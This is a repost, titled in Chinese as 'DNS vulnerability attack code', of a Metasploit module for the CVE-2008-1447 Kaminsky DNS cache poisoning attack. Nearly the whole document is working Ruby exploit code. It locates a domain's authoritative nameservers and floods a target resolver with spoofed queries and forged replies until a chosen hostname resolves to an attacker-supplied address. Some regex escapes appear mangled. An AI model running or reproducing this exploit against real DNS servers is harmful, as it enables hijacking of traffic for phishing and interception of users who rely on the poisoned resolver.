DNS漏洞攻击代码

出处: 作者:hdm
原文:http://metasploit.com/dev/trac/browser/framework3/trunk/modules/auxiliary/spoof/dns/baliwicked_host.rb?rev=5579#L1
	
         require 'net/dns'
	require 'scruby'
	require 'resolv'
	
	module Msf
	
	class Auxiliary::Spoof::Dns::BaliWickedHost < Msf::Auxiliary
	
	        include Exploit::Remote::Ip
	
	        def initialize(info = {})
	                super(update_info(info,
	                        'Name'           => 'DNS BaliWicked Attack',
	                        'Description'    => %q{
	                                This exploit attacks a fairly ubiquitous flaw in DNS implementations which
	                                Dan Kaminsky found and disclosed ~Jul 2008.  This exploit caches a single
	                                malicious host entry into the target nameserver by sending random sub-domain
	                                queries to the target DNS server coupled with spoofed replies to those
	                                queries from the authoritative nameservers for the domain which contain a
	                                malicious host entry for the hostname to be poisoned in the authority and
	                                additional records sections.  Eventually, a guessed ID will match and the
	                                spoofed packet will get accepted, and due to the additional hostname entry
	                                being within baliwick constraints of the original request the malicious host
	                                entry will get cached.
	                        },
	                        'Author'         => [ 'I)ruid', 'hdm' ],
	                        'License'        => MSF_LICENSE,
	                        'Version'        => '$Revision$',
	                        'References'     =>
	                                [
	                                        [ 'CVE', '2008-1447' ],
	                                        [ 'US-CERT-VU', '8000113' ],
	                                        [ 'URL', 'http://www.caughq.org/exploits/CAU-EX-2008-0002.html' ],
	                                ],
	                        'Privileged'     => true,
	                        'Targets'        =>
	                                [
	                                        ["BIND", 
	                                                {
	                                                        'Arch' => ARCH_X86,
	                                                        'Platform' => 'linux',
	                                                },
	                                        ],
	                                ],
	                        'DisclosureDate' => 'Jul 21 2008'
	                        ))
	                       
	                        register_options(
	                                [
	                                        OptPort.new('SRCPORT', [true, "The target server's source query port (0 for automatic)", nil]),
	                                        OptString.new('HOSTNAME', [true, 'Hostname to hijack', 'pwned.doxpara.com']),
	                                        OptAddress.new('NEWADDR', [true, 'New address for hostname', '1.3.3.7']),
	                                        OptAddress.new('RECONS', [true, 'Nameserver used for reconnaissance', '208.67.222.222']),
	                                        OptInt.new('XIDS', [true, 'Number of XIDs to try for each query', 10]),
	                                        OptInt.new('TTL', [true, 'TTL for the malicious host entry', 31337]),
	                                ], self.class)
	                                       
	        end
	       
	        def auxiliary_commands
	                return { "check" => "Determine if the specified DNS server (RHOST) is vulnerable" }
	        end
	
	        def cmd_check(*args)
	                targ = args[0] || rhost()
	                if(not (targ and targ.length > 0))
	                        print_status("usage: check [dns-server]")
	                        return
	                end
	
	                print_status("Using the Metasploit service to verify exploitability...")
	                srv_sock = Rex::Socket.create_udp(
	                        'PeerHost' => targ,
	                        'PeerPort' => 53
	                )               
	
	                random = false
	                ports  = []
	                lport  = nil
	               
	                1.upto(5) do |i|
	               
	                        req = Resolv::DNS::Message.new
	                        txt = "spoofprobe-check-#{i}-#{$$}#{(rand()*1000000).to_i}.red.metasploit.com"
	                        req.add_question(txt, Resolv::DNS::Resource::IN::TXT)
	                        req.rd = 1
	                       
	                        srv_sock.put(req.encode)
	                        res, addr = srv_sock.recvfrom()
	                       
	
	                        if res and res.length > 0
	                                res = Resolv::DNS::Message.decode(res)
	                                res.each_answer do |name, ttl, data|
	                                        if (name.to_s == txt and data.strings.join('') =~ /^([^/s]+)/s+.*red/.metasploit/.com/m)
	                                                t_addr, t_port = $1.split(':')
	
	                                                print_status(" >> ADDRESS: #{t_addr}  PORT: #{t_port}")
	                                                t_port = t_port.to_i
	                                                if(lport and lport != t_port)
	                                                        random = true
	                                                end
	                                                lport  = t_port
	                                                ports << t_port
	                                        end
	                                end
	                        end     
	                end
	               
	                srv_sock.close
	               
	                if(ports.length < 5)
	                        print_status("UNKNOWN: This server did not reply to our vulnerability check requests")
	                        return
	                end
	               
	                if(random)
	                        print_status("PASS: This server does not use a static source port. Ports: #{ports.join(", ")}")
	                        print_status("      This server may still be exploitable, but not by this tool.")
	                else
	                        print_status("FAIL: This server uses static source ports and is vulnerable to poisoning")
	                end
	        end
	               
	        def run
	                target   = rhost()
	                source   = Rex::Socket.source_address(target)
	                sport    = datastore['SRCPORT']
	                hostname = datastore['HOSTNAME'] + '.'
	                address  = datastore['NEWADDR']
	                recons   = datastore['RECONS']
	                xids     = datastore['XIDS'].to_i
	                ttl      = datastore['TTL'].to_i
	
	                domain = hostname.match(/[^/x2e]+/x2e[^/x2e]+/x2e$/)[0]
	
	                srv_sock = Rex::Socket.create_udp(
	                        'PeerHost' => target,
	                        'PeerPort' => 53
	                )
	
	                # Get the source port via the metasploit service if it's not set
	                if sport.to_i == 0
	                        req = Resolv::DNS::Message.new
	                        txt = "spoofprobe-#{$$}#{(rand()*1000000).to_i}.red.metasploit.com"
	                        req.add_question(txt, Resolv::DNS::Resource::IN::TXT)
	                        req.rd = 1
	                       
	                        srv_sock.put(req.encode)
	                        res, addr = srv_sock.recvfrom()
	                       
	                        if res and res.length > 0
	                                res = Resolv::DNS::Message.decode(res)
	                                res.each_answer do |name, ttl, data|
	                                        if (name.to_s == txt and data.strings.join('') =~ /^([^/s]+)/s+.*red/.metasploit/.com/m)
	                                                t_addr, t_port = $1.split(':')
	                                                sport = t_port.to_i
	
	                                                print_status("Switching to target port #{sport} based on Metasploit service")
	                                                if target != t_addr
	                                                        print_status("Warning: target address #{target} is not the same as the nameserver's query source address #{t_addr}!")
	                                                end
	                                        end
	                                end
	                        end
	                end
	
	                # Verify its not already cached
	                begin
	                        query = Resolv::DNS::Message.new
	                        query.add_question(hostname, Resolv::DNS::Resource::IN::A)
	                        query.rd = 0
	
	                        begin
	                                cached = false
	                                srv_sock.put(query.encode)
	                                answer, addr = srv_sock.recvfrom()
	
	                                if answer and answer.length > 0
	                                        answer = Resolv::DNS::Message.decode(answer)
	                                        answer.each_answer do |name, ttl, data|
	                                                if((name.to_s + ".") == hostname  and data.address.to_s == address)
	                                                        t = Time.now + ttl
	                                                        print_status("Failure: This hostname is already in the target cache: #{name} == #{address}")
	                                                        print_status("         Cache entry expires on #{t.to_s}... sleeping.")
	                                                        cached = true
	                                                        sleep ttl
	                                                end
	                                        end
	                                end
	                        end until not cached
	                rescue ::Interrupt
	                        raise $!
	                rescue ::Exception => e
	                        print_status("Error checking the DNS name: #{e.class} #{e} #{e.backtrace}")
	                end
	
	                res0 = Net::DNS::Resolver.new(:nameservers => [recons], :dns_search => false, :recursive => true) # reconnaissance resolver
	
	                print_status "Targeting nameserver #{target} for injection of #{hostname} as #{address}"
	
	                # Look up the nameservers for the domain
	                print_status "Querying recon nameserver for #{domain}'s nameservers..."
	                answer0 = res0.send(domain, Net::DNS::NS)
	                #print_status " Got answer with #{answer0.header.anCount} answers, #{answer0.header.nsCount} authorities"
	
	                barbs = [] # storage for nameservers
	                answer0.answer.each do |rr0|
	                        print_status " Got an #{rr0.type} record: #{rr0.inspect}"
	                        if rr0.type == 'NS'
	                                print_status "Querying recon nameserver for address of #{rr0.nsdname}..."
	                                answer1 = res0.send(rr0.nsdname) # get the ns's answer for the hostname
	                                #print_status " Got answer with #{answer1.header.anCount} answers, #{answer1.header.nsCount} authorities"
	                                answer1.answer.each do |rr1|
	                                        print_status " Got an #{rr1.type} record: #{rr1.inspect}"
	                                        res2 = Net::DNS::Resolver.new(:nameservers => rr1.address, :dns_search => false, :recursive => false, :retry => 1)
	                                        print_status "Checking Authoritativeness: Querying #{rr1.address} for #{domain}..."
	                                        answer2 = res2.send(domain)
	                                        if answer2 and answer2.header.auth? and answer2.header.anCount >= 1
	                                                nsrec = {:name => rr0.nsdname, :addr => rr1.address}
	                                                barbs << nsrec
	                                                print_status "  #{rr0.nsdname} is authoritative for #{domain}, adding to list of nameservers to spoof as"
	                                        end
	                                end
	                        end     
	                end
	
	                if barbs.length == 0
	                        print_status( "No DNS servers found.")
	                        srv_sock.close
	                        disconnect_ip
	                        return
	                end
	
	                # Flood the target with queries and spoofed responses, one will eventually hit
	                queries = 0
	                responses = 0
	
	                connect_ip if not ip_sock
	
	                print_status( "Attempting to inject a poison record for #{hostname} into #{target}:#{sport}...")
	
	                while true
	                        randhost = Rex::Text.rand_text_alphanumeric(12) + '.' + domain # randomize the hostname
	
	                        # Send spoofed query
	                        req = Resolv::DNS::Message.new
	                        req.id = rand(2**16)
	                        req.add_question(randhost, Resolv::DNS::Resource::IN::A)
	
	                        req.rd = 1
	
	                        buff = (
	                                Scruby::IP.new(
	                                        #:src   => barbs[0][:addr].to_s,
	                                        :src   => source,
	                                        :dst   => target,
	                                        :proto => 17
	                                )/Scruby::UDP.new(
	                                        :sport => (rand((2**16)-1024)+1024).to_i,
	                                        :dport => 53
	                                )/req.encode
	                        ).to_net
	                        ip_sock.sendto(buff, target)
	                        queries += 1
	                       
	                        # Send evil spoofed answer from ALL nameservers (barbs[*][:addr])
	                        req.add_answer(randhost, ttl, Resolv::DNS::Resource::IN::A.new(address))
	                        req.add_authority(domain, ttl, Resolv::DNS::Resource::IN::NS.new(Resolv::DNS::Name.create(hostname)))
	                        req.add_additional(hostname, ttl, Resolv::DNS::Resource::IN::A.new(address))
	                        req.qr = 1
	                        req.ra = 1
	
	                        p = rand(4)+2*10000
	                        p.upto(p+xids-1) do |id|
	                                req.id = id
	                                barbs.each do |barb|
	                                        buff = (
	                                                Scruby::IP.new(
	                                                        #:src   => barbs[i][:addr].to_s,
	                                                        :src   => barb[:addr].to_s,
	                                                        :dst   => target,
	                                                        :proto => 17
	                                                )/Scruby::UDP.new(
	                                                        :sport => 53,
	                                                        :dport => sport.to_i
	                                                )/req.encode
	                                        ).to_net
	                                        ip_sock.sendto(buff, target)
	                                        responses += 1
	                                end
	                        end
	
	                        # status update
	                        if queries % 1000 == 0
	                                print_status("Sent #{queries} queries and #{responses} spoofed responses...")
	                        end
	
	                        # every so often, check and see if the target is poisoned...
	                        if queries % 250 == 0
	                                begin
	                                        query = Resolv::DNS::Message.new
	                                        query.add_question(hostname, Resolv::DNS::Resource::IN::A)
	                                        query.rd = 0
	       
	                                        srv_sock.put(query.encode)
	                                        answer, addr = srv_sock.recvfrom()
	
	                                        if answer and answer.length > 0
	                                                answer = Resolv::DNS::Message.decode(answer)
	                                                answer.each_answer do |name, ttl, data|
	                                                        if((name.to_s + ".") == hostname and data.address.to_s == address)
	                                                                print_status("Poisoning successful after #{queries} attempts: #{name} == #{address}")
	                                                                disconnect_ip
	                                                                return
	                                                        end
	                                                end
	                                        end
	                                rescue ::Interrupt
	                                        raise $!
	                                rescue ::Exception => e
	                                        print_status("Error querying the DNS name: #{e.class} #{e} #{e.backtrace}")
	                                end
	                        end
	
	                end
	
	        end
	
	end
	end
 

你可能感兴趣的:(Server)